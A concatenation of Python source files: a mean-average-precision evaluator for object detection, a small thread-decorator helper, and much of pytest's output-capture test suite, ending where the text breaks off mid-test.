# output = output.cpu().detach().numpy()
# output[:, :, :4] = output[:, :, :4] / target['img_scale'].reshape(-1, 1, 1).cpu().numpy() # Normalized
# output[:, :, 2] = output[:, :, 2] + output[:, :, 0] # Change xywh to xyxy
# output[:, :, 3] = output[:, :, 3] + output[:, :, 1]
# target_tensor = target_tensor.cpu().detach().numpy()
#
# evaluator.add_predictions(output, target_tensor)
class MeanAveragePrecision(object):
def __init__(self, n_class, iou_array, score_th=0.1, multiprocessing=False):
self.n_class = n_class + 1
self.n_iou = len(iou_array)
self.iou_array = iou_array
self.zero = np.zeros([1, self.n_iou]).reshape(1, self.n_iou)
self.ones = np.ones([1, self.n_iou]).reshape(1, self.n_iou)
self.multiprocessing = multiprocessing
self.process = []
self.score_th = score_th
self.eps = 1e-6
if not self.multiprocessing:
self.data_per_class = [[] for i in range(self.n_class)]
self.n_samples_per_class = np.zeros(self.n_class)
else:
self.manager = Manager()
self.data_per_class = self.manager.list()
self.n_samples_per_class = self.manager.list()
[self.data_per_class.append([]) for i in range(self.n_class)]
@staticmethod
def area(box_a: np.ndarray):
return (box_a[:, :, 2] - box_a[:, :, 0]) * (box_a[:, :, 3] - box_a[:, :, 1])
def compute_iou(self,box_a: np.ndarray, box_b: np.ndarray):
"""
:param box_a: [B,P,4]
:param box_b: [B,L,5]
:return:
"""
area_a = np.expand_dims(MeanAveragePrecision.area(box_a), axis=1)
area_b = np.expand_dims(MeanAveragePrecision.area(box_b), axis=2)
box_a = np.expand_dims(box_a, axis=1)
box_b = np.expand_dims(box_b, axis=2)
xy_max = np.maximum(box_a[:, :, :, :2], box_b[:, :, :, :2])
xy_min = np.minimum(box_a[:, :, :, 2:], box_b[:, :, :, 2:])
inter_area = np.maximum(0, xy_min[:, :, :, 0] - xy_max[:, :, :, 0]) * np.maximum(0,
xy_min[:, :, :, 1] - xy_max[:,
:, :, 1])
iou = inter_area / ((area_a + area_b - inter_area) + self.eps)
return iou
def _calculate_sample_tp(self, prediction_i, label_i, iou_i):
for class_index in range(self.n_class): # Loop over classes
prediction_class_status = prediction_i[:, 5] == class_index
if np.any(prediction_class_status):
res_list = []
prediction_index = np.where(prediction_class_status)[0]
label_class_status = label_i[:, 4] == class_index
if np.any(label_class_status):
label_index = np.where(label_class_status)[0]
label_status = np.ones([label_index.shape[0], self.n_iou], dtype=bool)
for pi in prediction_index:
iou = iou_i[label_index, pi]
iou_index = np.argmax(iou)
max_iou = iou[iou_index]
score = prediction_i[pi, 4]
if score > self.score_th:
tp = (self.iou_array < max_iou) * label_status[iou_index, :]
label_status[iou_index, :] = label_status[iou_index, :] * np.logical_not(tp)
res_list.append(np.concatenate([tp, np.asarray(score).reshape(1)]))
else:
for pi in prediction_index:
score = prediction_i[pi, 4]
res_list.append(
np.concatenate([np.zeros([self.n_iou], dtype=bool), np.asarray(score).reshape(1)]))
self.data_per_class[class_index].extend(res_list)
if self.multiprocessing:
self.n_samples_per_class.append(np.bincount(label_i[:, -1].astype('int32'), minlength=self.n_class))
else:
self.n_samples_per_class += np.bincount(label_i[:, -1].astype('int32'), minlength=self.n_class)
def add_predictions(self, prediction: np.ndarray, label: np.ndarray):
"""
:param prediction: A tensor of shape [B,P,6] where 6 is box,score,class
:param label: A tensor of shape [B,L,5] where 5 is box,class
:return:
"""
iou_matrix = self.compute_iou(prediction[:, :, :4], label[:, :, :4])
for i in range(prediction.shape[0]): # Loop Over samples
prediction_i = prediction[i, :]
label_i = label[i, :]
iou_i = iou_matrix[i, :]
if self.multiprocessing:
p = Process(target=self._calculate_sample_tp, args=(prediction_i, label_i, iou_i)) # Passing the list
p.start()
else:
self._calculate_sample_tp(prediction_i, label_i, iou_i)
def evaluate(self):
per_class_list = []
per_class_scale = []
for class_index, class_data in enumerate(self.data_per_class):
if len(class_data) == 0:
ap = np.nan
else:
class_data = np.stack(class_data, axis=0)
sort_index = np.argsort(class_data[:, -1])[::-1]
tp_array = class_data[sort_index, :-1]
n_samples = self.n_samples_per_class[class_index]
per_class_scale.append(n_samples)
cum_true_positives = np.cumsum(tp_array, axis=0)
cum_false_positives = np.cumsum(1 - tp_array, axis=0)
precision = cum_true_positives.astype(float) / (
    cum_true_positives + cum_false_positives + self.eps)
recall = cum_true_positives.astype(float) / (n_samples + self.eps)
recall = np.concatenate(
[self.zero, recall, self.ones])
precision = np.concatenate([self.zero, precision, self.zero])
# Preprocess precision to be a non-decreasing array
for i in range(precision.shape[0] - 2, -1, -1):
precision[i, :] = np.maximum(precision[i, :], precision[i + 1, :])
average_precision_list = []
for iou_index in range(self.n_iou):
indices = np.where(recall[1:, iou_index] != recall[:-1, iou_index])[0] + 1
average_precision = np.sum(
(recall[indices, iou_index] - recall[indices - 1, iou_index]) * precision[indices, iou_index])
average_precision_list.append(average_precision)
per_class_list.append(average_precision_list)
return (np.mean(per_class_list), np.mean(per_class_list, axis=0))
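# Minimal usage sketch (assumptions: boxes are normalised xyxy in [0, 1] and class ids
# are 1-based, matching the commented example at the top of this file).
if __name__ == "__main__":
    evaluator = MeanAveragePrecision(n_class=2, iou_array=np.array([0.5, 0.75]))
    # one image, two predictions: [x1, y1, x2, y2, score, class]
    prediction = np.array([[[0.1, 0.1, 0.4, 0.4, 0.9, 1.0],
                            [0.5, 0.5, 0.9, 0.9, 0.8, 2.0]]])
    # matching ground truth: [x1, y1, x2, y2, class]
    label = np.array([[[0.1, 0.1, 0.4, 0.4, 1.0],
                       [0.5, 0.5, 0.9, 0.9, 2.0]]])
    evaluator.add_predictions(prediction, label)
    mean_ap, ap_per_iou = evaluator.evaluate()
    print("mAP:", mean_ap, "AP per IoU threshold:", ap_per_iou)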
|
AsyncHelper.py
|
# -*- coding: utf-8 -*-
import time
from threading import Thread
def thread_call(fn):
def wrapper(*args, **kwargs):
Thread(target=fn, args=args, kwargs=kwargs).start()
return wrapper
class Test:
def __index__(self):
pass
@staticmethod
@thread_call
def aa():
print(int(time.time()))
time.sleep(2)
print(int(time.time()))
return {"k", "v"}
if __name__ == '__main__':
l = []
for url in range(10):
r = Test.aa()
print(r)
print(l)
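# Sketch of a variant (assumption: the caller wants to wait for the thread or check on
# it later): return the Thread object instead of discarding it, since the original
# thread_call wrapper always returns None and the wrapped function's result is lost.
def thread_call_joinable(fn):
    def wrapper(*args, **kwargs):
        t = Thread(target=fn, args=args, kwargs=kwargs)
        t.start()
        return t  # caller may t.join() to wait for completion
    return wrapper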
|
test_capture.py
|
import contextlib
import io
import os
import subprocess
import sys
import textwrap
from io import UnsupportedOperation
from typing import BinaryIO
from typing import cast
from typing import Generator
from typing import TextIO
import pytest
from _pytest import capture
from _pytest.capture import _get_multicapture
from _pytest.capture import CaptureManager
from _pytest.capture import CaptureResult
from _pytest.capture import MultiCapture
from _pytest.config import ExitCode
from _pytest.pytester import Testdir
# note: py.io capture tests were copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
def StdCaptureFD(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.FDCapture(0) if in_ else None,
out=capture.FDCapture(1) if out else None,
err=capture.FDCapture(2) if err else None,
)
def StdCapture(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.SysCapture(0) if in_ else None,
out=capture.SysCapture(1) if out else None,
err=capture.SysCapture(2) if err else None,
)
def TeeStdCapture(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.SysCapture(0, tee=True) if in_ else None,
out=capture.SysCapture(1, tee=True) if out else None,
err=capture.SysCapture(2, tee=True) if err else None,
)
class TestCaptureManager:
@pytest.mark.parametrize("method", ["no", "sys", "fd"])
def test_capturing_basic_api(self, method):
capouter = StdCaptureFD()
old = sys.stdout, sys.stderr, sys.stdin
try:
capman = CaptureManager(method)
capman.start_global_capturing()
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method == "no":
assert old == (sys.stdout, sys.stderr, sys.stdin)
else:
assert not out
capman.resume_global_capture()
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method != "no":
assert out == "hello\n"
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
def test_init_capturing(self):
capouter = StdCaptureFD()
try:
capman = CaptureManager("fd")
capman.start_global_capturing()
pytest.raises(AssertionError, capman.start_global_capturing)
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_unicode(testdir, method):
obj = "'b\u00f6y'"
testdir.makepyfile(
"""\
# taken from issue 227 from nosetests
def test_unicode():
import sys
print(sys.stdout)
print(%s)
"""
% obj
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
testdir.makepyfile(
"""\
def test_unicode():
print('b\\u00f6y')
"""
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_collect_capturing(testdir):
p = testdir.makepyfile(
"""
import sys
print("collect %s failure" % 13)
sys.stderr.write("collect %s_stderr failure" % 13)
import xyz42123
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*Captured stdout*",
"collect 13 failure",
"*Captured stderr*",
"collect 13_stderr failure",
]
)
class TestPerTestCapturing:
def test_capture_and_fixtures(self, testdir):
p = testdir.makepyfile(
"""
def setup_module(mod):
print("setup module")
def setup_function(function):
print("setup " + function.__name__)
def test_func1():
print("in func1")
assert 0
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"setup module*",
"setup test_func1*",
"in func1*",
"setup test_func2*",
"in func2*",
]
)
@pytest.mark.xfail(reason="unimplemented feature")
def test_capture_scope_cache(self, testdir):
p = testdir.makepyfile(
"""
import sys
def setup_module(func):
print("module-setup")
def setup_function(func):
print("function-setup")
def test_func():
print("in function")
assert 0
def teardown_function(func):
print("in teardown")
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*test_func():*",
"*Captured stdout during setup*",
"module-setup*",
"function-setup*",
"*Captured stdout*",
"in teardown*",
]
)
def test_no_carry_over(self, testdir):
p = testdir.makepyfile(
"""
def test_func1():
print("in func1")
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
s = result.stdout.str()
assert "in func1" not in s
assert "in func2" in s
def test_teardown_capturing(self, testdir):
p = testdir.makepyfile(
"""
def setup_function(function):
print("setup func1")
def teardown_function(function):
print("teardown func1")
assert 0
def test_func1():
print("in func1")
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*teardown_function*",
"*Captured stdout*",
"setup func1*",
"in func1*",
"teardown func1*",
# "*1 fixture failure*"
]
)
def test_teardown_capturing_final(self, testdir):
p = testdir.makepyfile(
"""
def teardown_module(mod):
print("teardown module")
assert 0
def test_func():
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*def teardown_module(mod):*",
"*Captured stdout*",
"*teardown module*",
"*1 error*",
]
)
def test_capturing_outerr(self, testdir):
p1 = testdir.makepyfile(
"""\
import sys
def test_capturing():
print(42)
sys.stderr.write(str(23))
def test_capturing_error():
print(1)
sys.stderr.write(str(2))
raise ValueError
"""
)
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines(
[
"*test_capturing_outerr.py .F*",
"====* FAILURES *====",
"____*____",
"*test_capturing_outerr.py:8: ValueError",
"*--- Captured stdout *call*",
"1",
"*--- Captured stderr *call*",
"2",
]
)
class TestLoggingInteraction:
def test_logging_stream_ownership(self, testdir):
p = testdir.makepyfile(
"""\
def test_logging():
import logging
import pytest
stream = capture.CaptureIO()
logging.basicConfig(stream=stream)
stream.close() # to free memory/release resources
"""
)
result = testdir.runpytest_subprocess(p)
assert result.stderr.str().find("atexit") == -1
def test_logging_and_immediate_setupteardown(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_function(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_function(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors show first!
)
# verify proper termination
assert "closed" not in s
def test_logging_and_crossscope_fixtures(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_module(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_module(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors come first
)
# verify proper termination
assert "closed" not in s
def test_conftestlogging_is_shown(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
logging.warning("hello435")
"""
)
# make sure that logging is still captured in tests
result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
assert result.ret == ExitCode.NO_TESTS_COLLECTED
result.stderr.fnmatch_lines(["WARNING*hello435*"])
assert "operation on closed file" not in result.stderr.str()
def test_conftestlogging_and_test_logging(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello():
import logging
logging.warning("hello433")
assert 0
"""
)
result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
assert result.ret != 0
result.stdout.fnmatch_lines(["WARNING*hello433*"])
assert "something" not in result.stderr.str()
assert "operation on closed file" not in result.stderr.str()
def test_logging_after_cap_stopped(self, testdir):
testdir.makeconftest(
"""\
import pytest
import logging
log = logging.getLogger(__name__)
@pytest.fixture
def log_on_teardown():
yield
log.warning('Logging on teardown')
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello(log_on_teardown):
import logging
logging.warning("hello433")
assert 1
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p, "--log-cli-level", "info")
assert result.ret != 0
result.stdout.fnmatch_lines(
["*WARNING*hello433*", "*WARNING*Logging on teardown*"]
)
assert (
"AttributeError: 'NoneType' object has no attribute 'resume_capturing'"
not in result.stderr.str()
)
class TestCaptureFixture:
@pytest.mark.parametrize("opt", [[], ["-s"]])
def test_std_functional(self, testdir, opt):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsys):
print(42)
out, err = capsys.readouterr()
assert out.startswith("42")
""",
*opt,
)
reprec.assertoutcome(passed=1)
def test_capsyscapfd(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfd):
pass
def test_two(capfd, capsys):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*ERROR*setup*test_one*",
"E*capfd*capsys*same*time*",
"*ERROR*setup*test_two*",
"E*capsys*capfd*same*time*",
"*2 errors*",
]
)
def test_capturing_getfixturevalue(self, testdir):
"""Test that asking for "capfd" and "capsys" using request.getfixturevalue
in the same test is an error.
"""
testdir.makepyfile(
"""\
def test_one(capsys, request):
request.getfixturevalue("capfd")
def test_two(capfd, request):
request.getfixturevalue("capsys")
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"*test_one*",
"E * cannot use capfd and capsys at the same time",
"*test_two*",
"E * cannot use capsys and capfd at the same time",
"*2 failed in*",
]
)
def test_capsyscapfdbinary(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfdbinary):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
["*ERROR*setup*test_one*", "E*capfdbinary*capsys*same*time*", "*1 error*"]
)
@pytest.mark.parametrize("method", ["sys", "fd"])
def test_capture_is_represented_on_failure_issue128(self, testdir, method):
p = testdir.makepyfile(
"""\
def test_hello(cap{}):
print("xxx42xxx")
assert 0
""".format(
method
)
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["xxx42xxx"])
def test_stdfd_functional(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfd):
import os
os.write(1, b"42")
out, err = capfd.readouterr()
assert out.startswith("42")
capfd.close()
"""
)
reprec.assertoutcome(passed=1)
@pytest.mark.parametrize("nl", ("\n", "\r\n", "\r"))
def test_capfd_preserves_newlines(self, capfd, nl):
print("test", end=nl)
out, err = capfd.readouterr()
assert out.endswith(nl)
def test_capfdbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfdbinary):
import os
# some likely un-decodable bytes
os.write(1, b'\\xfe\\x98\\x20')
out, err = capfdbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_capsysbinary(self, testdir):
p1 = testdir.makepyfile(
r"""
def test_hello(capsysbinary):
import sys
sys.stdout.buffer.write(b'hello')
# Some likely un-decodable bytes.
sys.stdout.buffer.write(b'\xfe\x98\x20')
sys.stdout.buffer.flush()
# Ensure writing in text mode still works and is captured.
# https://github.com/pytest-dev/pytest/issues/6871
print("world", flush=True)
out, err = capsysbinary.readouterr()
assert out == b'hello\xfe\x98\x20world\n'
assert err == b''
print("stdout after")
print("stderr after", file=sys.stderr)
"""
)
result = testdir.runpytest(str(p1), "-rA")
result.stdout.fnmatch_lines(
[
"*- Captured stdout call -*",
"stdout after",
"*- Captured stderr call -*",
"stderr after",
"*= 1 passed in *",
]
)
def test_partial_setup_failure(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capsys, missingarg):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*test_partial_setup_failure*", "*1 error*"])
def test_keyboardinterrupt_disables_capturing(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capfd):
import os
os.write(1, b'42')
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p)
result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
assert result.ret == 2
def test_capture_and_logging(self, testdir):
"""#14"""
p = testdir.makepyfile(
"""\
import logging
def test_log(capsys):
logging.error('x')
"""
)
result = testdir.runpytest_subprocess(p)
assert "closed" not in result.stderr.str()
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
@pytest.mark.parametrize("no_capture", [True, False])
def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
testdir.makepyfile(
"""\
def test_disabled({fixture}):
print('captured before')
with {fixture}.disabled():
print('while capture is disabled')
print('captured after')
assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')
def test_normal():
print('test_normal executed')
""".format(
fixture=fixture
)
)
args = ("-s",) if no_capture else ()
result = testdir.runpytest_subprocess(*args)
result.stdout.fnmatch_lines(["*while capture is disabled*", "*= 2 passed in *"])
result.stdout.no_fnmatch_line("*captured before*")
result.stdout.no_fnmatch_line("*captured after*")
if no_capture:
assert "test_normal executed" in result.stdout.str()
else:
result.stdout.no_fnmatch_line("*test_normal executed*")
def test_disabled_capture_fixture_twice(self, testdir: Testdir) -> None:
"""Test that an inner disabled() exit doesn't undo an outer disabled().
Issue #7148.
"""
testdir.makepyfile(
"""
def test_disabled(capfd):
print('captured before')
with capfd.disabled():
print('while capture is disabled 1')
with capfd.disabled():
print('while capture is disabled 2')
print('while capture is disabled 1 after')
print('captured after')
assert capfd.readouterr() == ('captured before\\ncaptured after\\n', '')
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
[
"*while capture is disabled 1",
"*while capture is disabled 2",
"*while capture is disabled 1 after",
],
consecutive=True,
)
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures(self, testdir, fixture):
"""Ensure that capsys and capfd can be used by other fixtures during
setup and teardown."""
testdir.makepyfile(
"""\
import sys
import pytest
@pytest.fixture
def captured_print({fixture}):
print('stdout contents begin')
print('stderr contents begin', file=sys.stderr)
out, err = {fixture}.readouterr()
yield out, err
print('stdout contents end')
print('stderr contents end', file=sys.stderr)
out, err = {fixture}.readouterr()
assert out == 'stdout contents end\\n'
assert err == 'stderr contents end\\n'
def test_captured_print(captured_print):
out, err = captured_print
assert out == 'stdout contents begin\\n'
assert err == 'stderr contents begin\\n'
""".format(
fixture=fixture
)
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(["*1 passed*"])
result.stdout.no_fnmatch_line("*stdout contents begin*")
result.stdout.no_fnmatch_line("*stderr contents begin*")
@pytest.mark.parametrize("cap", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures_teardown(self, testdir, cap):
"""Ensure we can access setup and teardown buffers from teardown when using capsys/capfd (##3033)"""
testdir.makepyfile(
"""\
import sys
import pytest
import os
@pytest.fixture()
def fix({cap}):
print("setup out")
sys.stderr.write("setup err\\n")
yield
out, err = {cap}.readouterr()
assert out == 'setup out\\ncall out\\n'
assert err == 'setup err\\ncall err\\n'
def test_a(fix):
print("call out")
sys.stderr.write("call err\\n")
""".format(
cap=cap
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_setup_failure_does_not_kill_capturing(testdir):
sub1 = testdir.mkpydir("sub1")
sub1.join("conftest.py").write(
textwrap.dedent(
"""\
def pytest_runtest_setup(item):
raise ValueError(42)
"""
)
)
sub1.join("test_mod.py").write("def test_func1(): pass")
result = testdir.runpytest(testdir.tmpdir, "--traceconfig")
result.stdout.fnmatch_lines(["*ValueError(42)*", "*1 error*"])
def test_capture_conftest_runtest_setup(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest()
assert result.ret == 0
result.stdout.no_fnmatch_line("*hello19*")
def test_capture_badoutput_issue412(testdir):
testdir.makepyfile(
"""
import os
def test_func():
omg = bytearray([1,129,1])
os.write(1, omg)
assert 0
"""
)
result = testdir.runpytest("--capture=fd")
result.stdout.fnmatch_lines(
"""
*def test_func*
*assert 0*
*Captured*
*1 failed*
"""
)
def test_capture_early_option_parsing(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest("-vs")
assert result.ret == 0
assert "hello19" in result.stdout.str()
def test_capture_binary_output(testdir):
testdir.makepyfile(
r"""
import pytest
def test_a():
import sys
import subprocess
subprocess.call([sys.executable, __file__])
def test_foo():
import os;os.write(1, b'\xc3')
if __name__ == '__main__':
test_foo()
"""
)
result = testdir.runpytest("--assert=plain")
result.assert_outcomes(passed=2)
def test_error_during_readouterr(testdir):
"""Make sure we suspend capturing if errors occur during readouterr"""
testdir.makepyfile(
pytest_xyz="""
from _pytest.capture import FDCapture
def bad_snap(self):
raise Exception('boom')
assert FDCapture.snap
FDCapture.snap = bad_snap
"""
)
result = testdir.runpytest_subprocess("-p", "pytest_xyz", "--version")
result.stderr.fnmatch_lines(
["*in bad_snap", " raise Exception('boom')", "Exception: boom"]
)
class TestCaptureIO:
def test_text(self):
f = capture.CaptureIO()
f.write("hello")
s = f.getvalue()
assert s == "hello"
f.close()
def test_unicode_and_str_mixture(self):
f = capture.CaptureIO()
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_write_bytes_to_buffer(self):
"""In python3, stdout / stderr are text io wrappers (exposing a buffer
property of the underlying bytestream). See issue #1407
"""
f = capture.CaptureIO()
f.buffer.write(b"foo\r\n")
assert f.getvalue() == "foo\r\n"
class TestTeeCaptureIO(TestCaptureIO):
def test_text(self):
sio = io.StringIO()
f = capture.TeeCaptureIO(sio)
f.write("hello")
s1 = f.getvalue()
assert s1 == "hello"
s2 = sio.getvalue()
assert s2 == s1
f.close()
sio.close()
def test_unicode_and_str_mixture(self):
sio = io.StringIO()
f = capture.TeeCaptureIO(sio)
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_dontreadfrominput():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
assert f.buffer is f
assert not f.isatty()
pytest.raises(OSError, f.read)
pytest.raises(OSError, f.readlines)
iter_f = iter(f)
pytest.raises(OSError, next, iter_f)
pytest.raises(UnsupportedOperation, f.fileno)
f.close() # just for completeness
def test_captureresult() -> None:
cr = CaptureResult("out", "err")
assert len(cr) == 2
assert cr.out == "out"
assert cr.err == "err"
out, err = cr
assert out == "out"
assert err == "err"
assert cr[0] == "out"
assert cr[1] == "err"
assert cr == cr
assert cr == CaptureResult("out", "err")
assert cr != CaptureResult("wrong", "err")
assert cr == ("out", "err")
assert cr != ("out", "wrong")
assert hash(cr) == hash(CaptureResult("out", "err"))
assert hash(cr) == hash(("out", "err"))
assert hash(cr) != hash(("out", "wrong"))
assert cr < ("z",)
assert cr < ("z", "b")
assert cr < ("z", "b", "c")
assert cr.count("err") == 1
assert cr.count("wrong") == 0
assert cr.index("err") == 1
with pytest.raises(ValueError):
assert cr.index("wrong") == 0
assert next(iter(cr)) == "out"
assert cr._replace(err="replaced") == ("out", "replaced")
@pytest.fixture
def tmpfile(testdir) -> Generator[BinaryIO, None, None]:
f = testdir.makepyfile("").open("wb+")
yield f
if not f.closed:
f.close()
@contextlib.contextmanager
def lsof_check():
pid = os.getpid()
try:
out = subprocess.check_output(("lsof", "-p", str(pid))).decode()
except (OSError, subprocess.CalledProcessError, UnicodeDecodeError) as exc:
# about UnicodeDecodeError, see note on pytester
pytest.skip(f"could not run 'lsof' ({exc!r})")
yield
out2 = subprocess.check_output(("lsof", "-p", str(pid))).decode()
len1 = len([x for x in out.split("\n") if "REG" in x])
len2 = len([x for x in out2.split("\n") if "REG" in x])
assert len2 < len1 + 3, out2
class TestFDCapture:
def test_simple(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
data = b"hello"
os.write(fd, data)
pytest.raises(AssertionError, cap.snap)
cap.done()
cap = capture.FDCapture(fd)
cap.start()
os.write(fd, data)
s = cap.snap()
cap.done()
assert s == "hello"
def test_simple_many(self, tmpfile):
for i in range(10):
self.test_simple(tmpfile)
def test_simple_many_check_open_files(self, testdir):
with lsof_check():
with testdir.makepyfile("").open("wb+") as tmpfile:
self.test_simple_many(tmpfile)
def test_simple_fail_second_start(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
cap.done()
pytest.raises(AssertionError, cap.start)
def test_stderr(self):
cap = capture.FDCapture(2)
cap.start()
print("hello", file=sys.stderr)
s = cap.snap()
cap.done()
assert s == "hello\n"
def test_stdin(self):
cap = capture.FDCapture(0)
cap.start()
x = os.read(0, 100).strip()
cap.done()
assert x == b""
def test_writeorg(self, tmpfile):
data1, data2 = b"foo", b"bar"
cap = capture.FDCapture(tmpfile.fileno())
cap.start()
tmpfile.write(data1)
tmpfile.flush()
cap.writeorg(data2.decode("ascii"))
scap = cap.snap()
cap.done()
assert scap == data1.decode("ascii")
with open(tmpfile.name, "rb") as stmp_file:
stmp = stmp_file.read()
assert stmp == data2
def test_simple_resume_suspend(self):
with saved_fd(1):
cap = capture.FDCapture(1)
cap.start()
data = b"hello"
os.write(1, data)
sys.stdout.write("whatever")
s = cap.snap()
assert s == "hellowhatever"
cap.suspend()
os.write(1, b"world")
sys.stdout.write("qlwkej")
assert not cap.snap()
cap.resume()
os.write(1, b"but now")
sys.stdout.write(" yes\n")
s = cap.snap()
assert s == "but now yes\n"
cap.suspend()
cap.done()
pytest.raises(AssertionError, cap.suspend)
assert repr(cap) == (
"<FDCapture 1 oldfd={} _state='done' tmpfile={!r}>".format(
cap.targetfd_save, cap.tmpfile
)
)
# Should not crash with missing "_old".
assert repr(cap.syscapture) == (
"<SysCapture stdout _old=<UNSET> _state='done' tmpfile={!r}>".format(
cap.syscapture.tmpfile
)
)
def test_capfd_sys_stdout_mode(self, capfd):
assert "b" not in sys.stdout.mode
@contextlib.contextmanager
def saved_fd(fd):
new_fd = os.dup(fd)
try:
yield
finally:
os.dup2(new_fd, fd)
os.close(new_fd)
class TestStdCapture:
captureclass = staticmethod(StdCapture)
@contextlib.contextmanager
def getcapture(self, **kw):
cap = self.__class__.captureclass(**kw)
cap.start_capturing()
try:
yield cap
finally:
cap.stop_capturing()
def test_capturing_done_simple(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
def test_capturing_reset_simple(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
def test_capturing_readouterr(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
sys.stderr.write("error2")
out, err = cap.readouterr()
assert err == "error2"
def test_capture_results_accessible_by_attribute(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
capture_result = cap.readouterr()
assert capture_result.out == "hello"
assert capture_result.err == "world"
def test_capturing_readouterr_unicode(self):
with self.getcapture() as cap:
print("hxąć")
out, err = cap.readouterr()
assert out == "hxąć\n"
def test_reset_twice_error(self):
with self.getcapture() as cap:
print("hello")
out, err = cap.readouterr()
pytest.raises(ValueError, cap.stop_capturing)
assert out == "hello\n"
assert not err
def test_capturing_modify_sysouterr_in_between(self):
oldout = sys.stdout
olderr = sys.stderr
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
sys.stdout = capture.CaptureIO()
sys.stderr = capture.CaptureIO()
print("not seen")
